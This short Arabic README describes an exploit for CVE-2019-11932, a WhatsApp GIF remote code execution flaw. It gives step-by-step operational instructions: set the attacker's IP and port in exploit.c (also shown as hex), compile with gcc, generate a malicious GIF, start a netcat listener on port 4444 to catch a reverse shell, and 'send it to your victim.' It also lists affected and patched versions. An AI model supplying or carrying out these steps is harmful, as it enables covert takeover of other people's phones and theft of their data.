
استغلال لـ CVE-2019-11932، وهي ثغرة تنفيذ التعليمات البرمجية عن بُعد في WhatsApp GIF. قم بالتجميع والتشغيل لتشغيل الاستغلال والحصول على صدفة عكسية.
قم بتعديل عنوان الاستماع (عنوان المهاجم) ومنفذ الاستماع في ملف exploit.c
الكود السداسي التالي:
3139 322e 3136
382e 322e 3732 2034 3434 3420
قم بتجميع الكود:
gcc -o exploit egif_lib.c exploit.c
قم بتشغيل الملف المُجمَّع ./exploit exploit.gif
انسخ/الصق المخرجات في ملف gif
قم بتشغيل مستمع netcat:
nc -lvp 4444
أرسله إلى ضحيتك!
الإصدارات المتأثرة: 2.19.230 وما دون
تم تصحيحه رسميًا في الإصدار 2.19.244
المصدر: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
لينكد إن: https://www.linkedin.com/in/thomas-lounis-749456175/